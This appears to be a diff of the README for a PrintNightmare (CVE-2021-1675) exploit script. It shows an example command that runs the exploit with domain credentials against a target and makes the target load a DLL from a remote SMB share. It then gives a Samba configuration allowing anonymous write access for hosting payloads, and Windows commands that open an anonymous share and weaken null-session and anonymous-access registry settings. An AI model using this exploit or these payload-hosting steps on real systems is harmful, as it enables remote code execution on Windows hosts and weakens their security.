|
|
@ -47,3 +47,37 @@ Example; |
|
|
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' |
|
|
|
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' |
|
|
|
``` |
|
|
|
``` |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
### SMB configuration |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Easiest way to host payloads is to use samba and modify `/etc/samba/smb.conf ` to allow anonymous access |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
``` |
|
|
|
|
|
|
|
[global] |
|
|
|
|
|
|
|
map to guest = Bad User |
|
|
|
|
|
|
|
server role = standalone server |
|
|
|
|
|
|
|
usershare allow guests = yes |
|
|
|
|
|
|
|
idmap config * : backend = tdb |
|
|
|
|
|
|
|
smb ports = 445 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
[smb] |
|
|
|
|
|
|
|
comment = Samba |
|
|
|
|
|
|
|
path = /tmp/ |
|
|
|
|
|
|
|
guest ok = yes |
|
|
|
|
|
|
|
read only = no |
|
|
|
|
|
|
|
browsable = yes |
|
|
|
|
|
|
|
force user = smbuser |
|
|
|
|
|
|
|
``` |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
From windows it's also possible |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
``` |
|
|
|
|
|
|
|
mkdir C:\share |
|
|
|
|
|
|
|
icacls C:\share\ /T /grant Anonymous` logon:r |
|
|
|
|
|
|
|
icacls C:\share\ /T /grant Everyone:r |
|
|
|
|
|
|
|
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone' |
|
|
|
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes |
|
|
|
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f |
|
|
|
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f |
|
|
|
|
|
|
|
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f |
|
|
|
|
|
|
|
``` |
|
|
|
|
|
|
|
|
|
|
|